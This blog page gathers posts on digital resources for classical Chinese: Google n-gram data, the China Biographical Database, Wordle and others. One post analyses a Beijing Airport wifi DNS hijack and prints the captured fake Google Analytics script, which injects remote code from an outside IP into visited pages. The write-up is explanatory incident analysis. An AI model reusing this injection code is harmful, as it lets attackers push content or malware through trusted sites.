Digital Sinology

Google n-grams and pre-modern Chinese

Posted on 14 April 2015 by digital

The Google n-gram viewer allows real-time searching of the frequencies of words and word sequences over time across a large corpus of texts digitized as part of the Google Books project. Without getting into the debate as to whether things like broad cultural trends can legitimately be deduced from these results, it seems clear that access to term and n-gram frequency statistics generated from a large enough corpus at least ought to be able to tell us interesting things about observed word use (though probably with important caveats about things like selection of material).

So the fact that Google’s n-gram results include data for Chinese (albeit only in simplified characters) going back as far as 1500 AD sounds very promising. The online n-gram viewer allows querying of this data, so we can immediately get some results. For example, if we keep the default search scope of 1800-2000 (the authors themselves acknowledge that data gets quite sparse before 1800 so data from earlier than that may be less meaningful), and search for a single character like “万”, we get a nice graph of its frequency over time:

This looks like a good start, although we get noticeably less smooth results from the pre-1960 part of the graph. Trying some other characters, we can get some nice results like this one that seem plausibly attributable to the shift from literary to vernacular Chinese:

Unfortunately though, further queries quickly show the limitations of the data. According to the Google n-gram data, “Mengzi”, the name both of one of the most revered Chinese philosophers of the classical period and of the hugely important canonical text attributed to him, is first mentioned in 1927:

Confucius himself doesn’t fare much better, especially when we go back earlier than 1800 – and the Analects doesn’t even get mentioned once until the 1950s:

Ouch. So it looks like there may be some pretty serious issues with the data even after 1800, and perhaps even as late as 1950. Of course, for a variety of reasons we would expect there to be more data available for the last 50 years or so. How much data is there? Luckily this information is available online.

Looking at the numbers it quickly becomes clear that the pre-modern data is fairly sparse: the first entry in the “total counts” file is for the year 1510, and records a single volume of 231 pages with only 2206 “matches” (i.e. total 1-grams). This compares with the first English entry for 1505, with 32059 matches for one volume of 231 pages. Apart from the total quantity of data, one worry is that the number of recorded 1-grams does not seem to fit well with the number of pages – apparently there are fewer than ten recorded 1-grams per page for this volume, which seems improbably few. Adding up the total 1-grams for each year, we get a total of 65195 1-grams by 1560, and by 1900 the figure increases to over 11 million – still less than 0.05% of the total for the whole set (over 26 billion), but definitely enough for us to reasonably expect non-zero results for common terms.
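The arithmetic behind those two observations is easy to check. The sketch below simply re-uses the figures quoted above (it does not re-read Google's files, and the rounded totals of 11 million and 26 billion are lower bounds taken from the text); the function names are my own.

```javascript
// Figures as quoted in the post, not re-fetched from the "total counts" files.
const firstChineseEntry = { year: 1510, matches: 2206, pages: 231, volumes: 1 };
const firstEnglishEntry = { year: 1505, matches: 32059, pages: 231, volumes: 1 };

// Average number of recorded 1-grams per scanned page.
function matchesPerPage(entry) {
  return entry.matches / entry.pages;
}

// Share of the whole corpus, expressed as a percentage.
function percentOfTotal(part, total) {
  return (part / total) * 100;
}

const chinesePerPage = matchesPerPage(firstChineseEntry);
const englishPerPage = matchesPerPage(firstEnglishEntry);

// "Over 11 million" 1-grams by 1900 against "over 26 billion" overall (rounded).
const pre1900Percent = percentOfTotal(11e6, 26e9);

console.log(chinesePerPage.toFixed(1)); // under ten 1-grams per page
console.log(englishPerPage.toFixed(1)); // well over a hundred per page
console.log(pre1900Percent.toFixed(3)); // below the 0.05% quoted above
```

The contrast between the two per-page averages for volumes of identical length is what makes the Chinese figure look suspicious.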

So it does seem surprising that so many results should end up being zero even in cases where Google Books does have some data. For instance, although a search for “寡人” again has no data for any pre-1950 texts, the n-gram viewer itself provides a handy link to “Search in Google Books: 1800 – 1957”, which does return a number of results. This is interesting, because the search results in Google Books also give snippets of Google’s corresponding OCR results. For instance, Google Books has “寡人” occurring on various pages of a book it describes as “馬氏繹史: 160卷年表, 第 13-24 卷”, published according to Google Books in 1897:

Given the apparent errors (although the book is surely in the public domain, no image view or download is available), this book may have been excluded because of poor OCR quality or other reasons, and/or assigned a different date (the text itself being composed earlier than the publication of this edition). (An interesting aside: the results you get for the same search within the same volume of Google Books vary with location. In this case, “寡人” within this volume gets 67 results from Hong Kong, but only 35 from the US.) The first hit looks like it might correspond to parts of this page and the following one on the Chinese Text Project (based on a different edition of the text however).

A final issue that may affect the results is that of tokenization. Since Chinese doesn’t delimit words, the texts first have to be split into words based upon their content. So not every sequence of the characters “寡” and “人” will be counted as an instance of the term “寡人”. This is likely to introduce further problems, partly because it’s a somewhat difficult problem to begin with, but also because it will become a near-impossible task when additional corruption of the source text is introduced through OCR.
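To make the tokenization point concrete, here is a minimal sketch of one very simple segmentation strategy, forward maximum matching against a word list. I don't know what segmenter Google actually used; the tiny lexicon and the second input string are contrived purely for illustration.

```javascript
// Hypothetical mini-lexicon; a real segmenter would use a far larger one.
const lexicon = new Set(["多寡", "人數", "寡人"]);
const maxWordLength = 2;

// Greedy forward maximum matching: at each position take the longest
// lexicon entry that fits, otherwise fall back to a single character.
function segment(text) {
  const chars = Array.from(text);
  const tokens = [];
  let i = 0;
  while (i < chars.length) {
    let matched = chars[i];
    for (let len = Math.min(maxWordLength, chars.length - i); len > 1; len--) {
      const candidate = chars.slice(i, i + len).join("");
      if (lexicon.has(candidate)) {
        matched = candidate;
        break;
      }
    }
    tokens.push(matched);
    i += Array.from(matched).length;
  }
  return tokens;
}

// Number of tokens equal to the given term.
function countTerm(tokens, term) {
  return tokens.filter((t) => t === term).length;
}

const asWord = segment("寡人之於國也"); // "寡人" is found as a token here
const notAsWord = segment("多寡人數");   // 寡 and 人 are adjacent, but split apart
console.log(asWord, countTerm(asWord, "寡人"));
console.log(notAsWord, countTerm(notAsWord, "寡人"));
```

In the second string the characters “寡” and “人” sit side by side, yet the term “寡人” is counted zero times, because the segmenter has already consumed “寡” as part of another word. A single OCR error in a neighbouring character could change the segmentation in the same way.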

In summary, it seems that the Google n-gram data may still need some work before it will be useful for pre-modern Chinese.

Followup post: When n-grams go bad


China Biographical Database

Posted on 12 April 2015 by digital

The China Biographical Database Project (CBDB) describes itself as “an online relational database with biographical information about approximately 328,000 individuals as of May 2014, primarily from the 7th through 19th centuries”. A joint project of Harvard’s Fairbank Center for Chinese Studies, Academia Sinica’s Institute of History and Philology, and Peking University’s Center for Research on Ancient Chinese History, the project’s relatively compact website belies an extraordinary wealth of structured data that is available for download in the form of an Access database, and can also be directly queried using an API.

The level of detail included in the database is quite astounding – and, crucially for this kind of material, the data is carefully structured such that many kinds of complex queries for specific types of information are possible.

The underlying tables that store the information can also be accessed directly to construct complex queries, or to export subsets of the data:

A simple public API is also offered that allows direct querying of the data and returns either human-readable HTML or structured data in XML or JSON. At present the only supported queries for this API appear to be names in Chinese or Pinyin and record number, which significantly limits its flexibility versus the Access database, but for applications where these queries are sufficient it provides a very neat way of accessing the data in a structured format. According to the site, at least four other projects are currently making use of the API.
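As a rough sketch of what a query by name or record number might look like, the helper below only builds the request URL. The endpoint address and the parameter names (`id`, `name`, and `o` for the output format) are written from my recollection of the project's API notes and should be treated as assumptions to check against the CBDB site; the record number used in the example is likewise just an illustration.

```javascript
// Assumed endpoint; verify against the CBDB website before relying on it.
const CBDB_API_BASE = "https://cbdb.fas.harvard.edu/cbdbapi/person.php";

// Build a query URL from either a record number or a name (Chinese or Pinyin).
// The parameter names "id", "name" and "o" are assumptions, not confirmed here.
function buildPersonQuery(query, format = "json") {
  const params = new URLSearchParams();
  if (query.id !== undefined) {
    params.set("id", String(query.id));
  } else if (query.name !== undefined) {
    params.set("name", query.name);
  } else {
    throw new Error("Expected either an id or a name");
  }
  params.set("o", format);
  return `${CBDB_API_BASE}?${params.toString()}`;
}

const byId = buildPersonQuery({ id: 1762 });
const byName = buildPersonQuery({ name: "王安石" }, "xml");
console.log(byId);
console.log(byName); // the Chinese name is percent-encoded automatically
```

The resulting URL can then be passed to `fetch` or any other HTTP client; keeping URL construction separate makes it easy to adjust if the real parameters differ.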

Surprisingly, even though the entire database is made freely available for download, I found no explicit license or statement as to acceptable reuse of the data, other than the generic copyright notice at the bottom of the website. It is therefore unclear whether it is intended to be open source, though it is clearly open access.


Beijing Airport Wifi hacked: DNS attack pushes adverts to sites via Google Analytics

Posted on 4 April 2015 by digital

While at Beijing Airport recently, I connected to the official airport wifi service, and noticed something strange when visiting ctext.org:

A large floating advert had appeared at the bottom right of every page of the site, obscuring much of the content.

Could the site have been hacked? I searched the HTML source for unusual Javascript or Iframe additions, but there weren’t any – all the code included should have been legitimate. Only one inclusion was not from ctext.org: the standard Google Analytics code, which loads asynchronously from http://www.google-analytics.com/ga.js. Let’s take a look at that file when retrieved over Beijing Airport wifi:

location_sign="jc";
var sign = new Error('log').stack;
var regx = /.*\/(.*?\.js.*?)/;
if(sign)
{
	var group = sign.match(regx);
	if(group)
	{
		var s = group[1];
	}
}
var url = "http://121.40.180.161/ad.js?" + s;
var jsNode = document.createElement('script');
jsNode.setAttribute('src',url);
if(document.body)
{
	if(document.body.appendChild)
	{
		document.body.appendChild(jsNode);
	}
}
else
{
	var head = document.getElementsByTagName('head').item(0);
	if(head.appendChild)
	{
		head.appendChild(jsNode);
	}
}

This code basically says something like “fetch an advert from 121.40.180.161 and attach it to this webpage” – definitely not what Google Analytics ought to be doing. So why is this happening?
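Before chasing that question, it is worth seeing what the odd-looking first few lines of the script contribute. The sketch below replays the stack-trace trick in isolation: the regular expression is copied from the captured file, but the sample stack string is hypothetical (real stack formats differ between browsers), and nothing is actually requested from the advert server.

```javascript
// Regular expression copied verbatim from the captured ga.js replacement.
const regx = /.*\/(.*?\.js.*?)/;

// Hypothetical stack trace, roughly in the style some browsers produce.
const sampleStack =
  "Error: log\n    at http://www.google-analytics.com/ga.js:2:12";

// Mirror of the captured logic: pull the script file name out of the stack.
function extractScriptName(stack) {
  const group = stack ? stack.match(regx) : null;
  return group ? group[1] : undefined;
}

const scriptName = extractScriptName(sampleStack);

// The captured code appends this value as the query string of the advert URL.
const adUrl = "http://121.40.180.161/ad.js?" + scriptName;

console.log(scriptName); // the name of the file the code is running from
console.log(adUrl);
```

In other words, the injected script appears to report which hijacked file it was loaded as, presumably so that one advert server can sit behind several different replaced scripts. That still leaves the question of how this file came to be served in place of the real one.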

home:~ user$ ping www.google-analytics.com
PING www-google-analytics.l.google.com (203.208.40.133): 56 data bytes
64 bytes from 203.208.40.133: icmp_seq=0 ttl=58 time=36.207 ms
64 bytes from 203.208.40.133: icmp_seq=1 ttl=58 time=38.659 ms

OK, so www.google-analytics.com is resolving to 203.208.40.133… who does that belong to?

home:~ user$ whois 203.208.40.133

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#


#
# Query terms are ambiguous.  The query is assumed to be:
#     "n 203.208.40.133"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=203.208.40.133?showDetails=true&showARIN=false&ext=netref2
#

NetRange:       203.0.0.0 - 203.255.255.255
CIDR:           203.0.0.0/8
NetName:        APNIC-203
NetHandle:      NET-203-0-0-0-1
Parent:          ()
NetType:        Allocated to APNIC
OriginAS:
Organization:   Asia Pacific Network Information Centre (APNIC)
RegDate:        1994-04-05
Updated:        2010-08-02
Comment:        This IP address range is not registered in the ARIN database.
Comment:        For details, refer to the APNIC Whois Database via
Comment:        WHOIS.APNIC.NET or http://wq.apnic.net/apnic-bin/whois.pl
Comment:        ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:        for the Asia Pacific region. APNIC does not operate networks
Comment:        using this IP address range and is not able to investigate
Comment:        spam or abuse reports relating to these addresses. For more
Comment:        help, refer to http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
Ref:            http://whois.arin.net/rest/net/NET-203-0-0-0-1

OrgName:        Asia Pacific Network Information Centre
OrgId:          APNIC
Address:        PO Box 3646
City:           South Brisbane
StateProv:      QLD
PostalCode:     4101
Country:        AU
RegDate:
Updated:        2012-01-24
Ref:            http://whois.arin.net/rest/org/APNIC

ReferralServer: whois://whois.apnic.net

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net
OrgTechRef:    http://whois.arin.net/rest/poc/AWC12-ARIN

OrgAbuseHandle: AWC12-ARIN
OrgAbuseName:   APNIC Whois Contact
OrgAbusePhone:  +61 7 3858 3188
OrgAbuseEmail:  search-apnic-not-arin@apnic.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/AWC12-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#

% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '203.208.32.0 - 203.208.63.255'

inetnum:        203.208.32.0 - 203.208.63.255
netname:        GOOGLECN
descr:          Beijing Gu Xiang Information Technology Co.,Ltd.
descr:          Bldg 6, No.1 Zhongguancun East Rd, Beijing
country:        CN
admin-c:        ZM657-AP
tech-c:         ZM657-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
changed:        ipas@cnnic.cn 20110412
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.cn 20110428
source:         APNIC

person:         GOOGLECN Contact
address:        Kejian Building
address:        Tsinghua Science Park Building 6
address:        No. 1 Zhongguancun East Road
address:        Haidian District
address:        Beijing P.R. China 100084
country:        CN
phone:          +86-10-62503000
fax-no:         +86-10-62503001
e-mail:         cnnic-contact@google.com
nic-hdl:        ZM657-AP
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.net 20110426
source:         APNIC

% Information related to '203.208.40.0/23AS24424'

route:          203.208.40.0/23
descr:          FM SITE5
origin:         AS24424
notify:         nst@corp.ganji.com
mnt-by:         MAINT-CNNIC-AP
changed:        nst@corp.ganji.com 20060612
source:         APNIC

% This query was served by the APNIC Whois Service version 1.69.1-APNICv1r3 (WHOIS4)

Huh. That’s strange – the IP serving the fake Analytics code is actually allocated to GOOGLECN, registered to Google’s office in Beijing. What’s up with that? There’s definitely something funny going on here, presumably relating to the last part of the query response about 203.208.40.0/23 ultimately belonging to “FM SITE5” and perhaps being associated with ganji.com.

Anyway, it looks like what is happening is that someone is altering the DNS response for www.google-analytics.com to point to a server they control so they can display adverts on other people’s websites – in fact on any website that uses Google Analytics. For example:

It has to be said that this is a pretty good scam. After all, unless users are already familiar with the site they are visiting, they may simply assume that the adverts are legitimate ones run by the owners of these sites, while the profits go to the scammer and the site owner remains unaware that anything has happened. So who’s the scammer? Assuming this scam does not originate with someone at Google China or Beijing Airport, it seems most likely that someone’s router has been hacked, as has recently been reported elsewhere:

The scary thing about this is that the malicious code can easily be set to do all sorts of things – displaying adverts is relatively benign compared to popups appearing to come from legitimate and trusted sites that trick users into downloading malware-ridden software or direct attacks on known browser weaknesses, for instance. By compromising routers that service large numbers of users – airport wifi being an excellent example – scams taking advantage of Google Analytics code can quickly affect large numbers of people. Since from a user perspective the genuine Analytics code has no visible effect, its replacement with malicious code can be easily overlooked.
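One rough way to notice this kind of tampering is to compare the answer from the network's own DNS resolver with the answer from a resolver you choose yourself. The sketch below does this with Node's built-in `dns` module. The choice of 8.8.8.8 as the reference resolver is my assumption, and the check is only a prompt for a closer look: large services legitimately return different addresses in different places, and a hostile network could intercept the reference query too.

```javascript
// Pure comparison step: which locally resolved addresses are absent
// from the reference resolver's answer?
function compareAnswers(localAddresses, referenceAddresses) {
  const reference = new Set(referenceAddresses);
  const unexpected = localAddresses.filter((ip) => !reference.has(ip));
  return { suspicious: unexpected.length > 0, unexpected };
}

// Resolve a hostname twice: once with the system-configured resolver and
// once with an explicitly chosen one (assumed here to be 8.8.8.8).
async function checkHost(hostname, referenceServer = "8.8.8.8") {
  // Loaded inside the function so the pure helper above has no dependencies.
  const dnsPromises = require("node:dns").promises;
  const resolver = new dnsPromises.Resolver();
  resolver.setServers([referenceServer]);
  const [local, reference] = await Promise.all([
    dnsPromises.resolve4(hostname),
    resolver.resolve4(hostname),
  ]);
  return compareAnswers(local, reference);
}

// Example call (needs network access, so it is left commented out):
// checkHost("www.google-analytics.com").then(console.log);
```

A mismatch on its own proves nothing, but a mismatch combined with a file that looks nothing like the real Analytics script, as in this case, is a strong hint.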


HK Visa Online Application Status Enquiry – Invalid Reference Number

Posted on 3 February 2015 by digital

This post is a little off-topic, but perhaps will help people Googling with the same problem.

A trivial issue nearly prevented me from being able to determine the status of my Hong Kong visa application online. The reference number I’d been given was of the form XXXX-nnnn-nn – four letters, four digits, then another two digits:

When I tried submitting the code exactly as (hand-)written on my receipt, the system told me the number was invalid:

For some reason the programmer in me thought, “surely it couldn’t be that the fields have to be zero padded?” – so I tried adding zeros to the middle field until the form would allow no more. With the form now displaying “XXXX-000nnnn-nn”, I submitted it, and was amazed to see that it worked! Presumably the software makes a string comparison even for the numeric fields, so the reference number must have exactly 7 digits in the middle field:
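For anyone wanting to script the fix, the padding amounts to the following. This is only a sketch of the workaround described above: the width of 7 comes from my own trial and error with the form, and the sample reference number is made up.

```javascript
// Left-pad the middle field of an "XXXX-nnnn-nn" style reference with zeros.
// The default width of 7 is what the online form appeared to require.
function padReferenceNumber(reference, middleWidth = 7) {
  const parts = reference.trim().split("-");
  if (parts.length !== 3) {
    throw new Error("Expected a reference of the form XXXX-nnnn-nn");
  }
  const [prefix, middle, suffix] = parts;
  return [prefix, middle.padStart(middleWidth, "0"), suffix].join("-");
}

const padded = padReferenceNumber("ABCD-1234-56"); // made-up reference number
console.log(padded);
```

A reference whose middle field already has seven digits passes through unchanged, so the function is safe to apply to any input of this shape.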

In my case it turned out that being able to check online was very useful, as nobody was answering the phone at the relevant immigration department, and once I was finally able to check online, I discovered that my application was already approved and ready to collect.

I couldn’t find any mention of this in the instructions, and it certainly wasn’t obvious from the error message (I’d assumed that my application must be of the “not supported” type) – perhaps this report will help someone else check their status (or help someone at the immigration department fix their software/error message).


Ming Qing Women’s Writings

Posted on 10 January 2015 by digital

The Ming Qing Women’s Writings (明清婦女著作) site provides a carefully curated database of women’s writing from the Ming, Qing, and Republican periods of Chinese history. The database contains a wealth of information about authors and individual texts (and poems) within individual works. The online version also includes facsimiles of all the corresponding texts that can be navigated using this extensive set of data.

While all of this data can be conveniently searched online in Chinese or Pinyin, it is also possible to download the entire data set in MS Access format.

Encouragingly the site seems to have been actively maintained (“last update: December 2014”), and is currently part of a research project going on until at least 2016.


CHinese ANcient Texts (CHANT) update

Posted on 6 January 2015 by digital

The Chinese University of Hong Kong’s subscription-based CHinese ANcient Texts (CHANT) website has recently undergone some renovation. The new interface appears to largely follow the layout and functionality of the previous version, although there seem to be a few puzzling changes, such as the omission of source text explanations and lists of emendations, both of which were previously available at least for most texts in the Pre-Qin and Han section. A new feature is the option to display a text with or without the corrections applied to it, by clicking the new “校改” and “原文” buttons.

The site now makes extensive use of Javascript to fetch pages, which can be frustrating as there is no page load indication. A huge benefit of the new site however is that the annotations finally display correctly on browsers other than Internet Explorer.

Coinciding with the change, it has become possible (at least at the institution that I’m based at) to access more areas of the database, though it’s unclear whether this is due to an accidental change, a policy decision, or the library paying a higher subscription rate.


Reviews of Digital Resources for Sinologists

Posted on 28 December 2014 by digital

Titled “Digital Resources for Sinologists 1.0“, this post by Holger Schneider and Jeffrey Tharsen gives a useful overview of digital dictionaries and other online tools for Chinese, many of which will be of interest to Sinologists, as well as offering some background on general aspects of digital dictionaries of Chinese.

Separated into two parts, titled “An Introduction to Chinese Electronic Dictionaries and Criteria for Their Evaluation” and “An Annotated List of Common Digital Dictionaries / Lexical Tools / Learning and Translation Tools / Encyclopædia”, it provides a valuable guide to many of the most important tools and databases in the field, as well as introducing a few less well-known resources that may also be of interest.


Classical Chinese Wordles

Posted on 20 September 2012 by digital

The ever-popular Wordle, like many tools designed to work with digital corpora, can be used on Chinese text with minor tweaking. Wordle takes a text and ranks the words in it in order of frequency, then produces a tag cloud that gives a visual summary with more frequently occurring words in larger letters. Though many tools do this, Wordle’s output is often particularly attractive.

To use Wordle with Chinese, the text first has to be split into words using spaces or other punctuation; if not, Wordle will treat each phrase as if it were a word. So instead of “孟子見梁惠王。”, we really want “孟 子 見 梁 惠 王。”. Adding a space between each character is a reasonable approximation for classical Chinese, but obviously means that proper names like “孟子” don’t get treated correctly. Once the text is ready, it can be pasted straight into the Wordle tool (this requires that Java is installed and enabled in your browser). With Chinese text, there are a couple of extra steps. Firstly, on my system at least the default font used doesn’t work for Chinese, so initially instead of Chinese words I get empty boxes. To fix this, go to the Wordle font menu and choose a different font (e.g. “Chrysanthi Unicode”, which seems to work). Secondly, Chinese seems to be detected by Wordle as Arabic, and this results in random words being omitted; click on the “Language” menu in Wordle, and change the setting to “Do not remove common words”.

The tag clouds here are of the full texts of the Mozi, Mengzi, Hanfeizi, Xunzi, and Daodejing from the Chinese Text Project – can you work out which is which?

Wordle has the option to automatically remove some of the most common words in a language from the list – so that uninteresting words such as “a”, “the”, “of” and so on don’t appear as giant words overwhelming the tag cloud. Since Wordle doesn’t have a list for classical Chinese, I excluded a fairly arbitrary set of words from the input to produce these images: 也之以則而其曰者於與于不. Other particles such as 矣 should probably also be added to this list.
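The preparation steps described above (one character per “word”, with the excluded set removed) can be sketched in a few lines. This is not the exact script I used; the function names are illustrative, and the sketch drops punctuation outright rather than keeping it as a separator.

```javascript
// The excluded characters listed above.
const excluded = new Set(Array.from("也之以則而其曰者於與于不"));

// Keep only Han characters, drop the excluded ones, and separate the rest
// with spaces so that Wordle treats each character as a word.
function prepareForWordle(text) {
  return Array.from(text)
    .filter((ch) => /\p{Script=Han}/u.test(ch))
    .filter((ch) => !excluded.has(ch))
    .join(" ");
}

// Count how often each character occurs in the prepared text.
function characterFrequencies(prepared) {
  const counts = new Map();
  for (const ch of prepared.split(" ")) {
    if (ch === "") continue;
    counts.set(ch, (counts.get(ch) || 0) + 1);
  }
  return counts;
}

const prepared = prepareForWordle("孟子見梁惠王。王曰：叟不遠千里而來");
console.log(prepared);
console.log(characterFrequencies(prepared).get("王")); // 王 occurs twice
```

Adding 矣 or other particles is then just a matter of extending the string passed to `excluded`.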

This highlights an important difficulty with word clouds in classical Chinese, however. Words like “無”, “為”, and “有” are very common in classical Chinese texts, but they are also philosophically interesting – in certain contexts and usages. Similarly “故” is a very common and not terribly interesting sentence connective meaning something like “thus” or “therefore”, but is also used to mean “cause”; “是” often simply means “this”, but can also mean “right”, “approve”, or “correct”.

As a result, a highly prominent appearance of 無 and 為 as in some of these Wordles isn’t necessarily an indication that the source was a Daoist text like the Daodejing – in fact if you look closely, you’ll see that in all of these texts 無 and 為 appear fairly often.

Even with these caveats however, this is a much more interesting and aesthetically pleasing way to look at the data than browsing a table of word frequencies.


Classical Chinese internet resources

Posted on 9 June 2012 by digital

A huge though largely unsorted list of Chinese language web sites and resources related to the study of early China has been assembled here:
http://ctext.org/discuss.pl?if=en&thread=3223065


Yīntōng: Chinese Phonological Database

Posted on 31 March 2012 by digital

Yīntōng, created by David Prager Branner, is an online database of characters in the Guǎngyùn 廣韻, a dictionary dating from 1008 C.E.

The database has the following main functions:

Lookup by character, returning information about the fǎnqiè associated with the character, the phonological values represented by those fǎnqiè, and the page number of the Guǎngyùn where that reading appears.
Lookup by medieval Chinese reading, returning a list of the other characters in the same xiǎoyùn.
Lookup by two medieval Chinese readings, returning a list of any characters appearing in both xiǎoyùn.
Lookup by multiple characters, returning a transcription of each character based on the Guǎngyùn’s readings.

Further details: http://yintong.americanorientalsociety.org/html/about.htm.

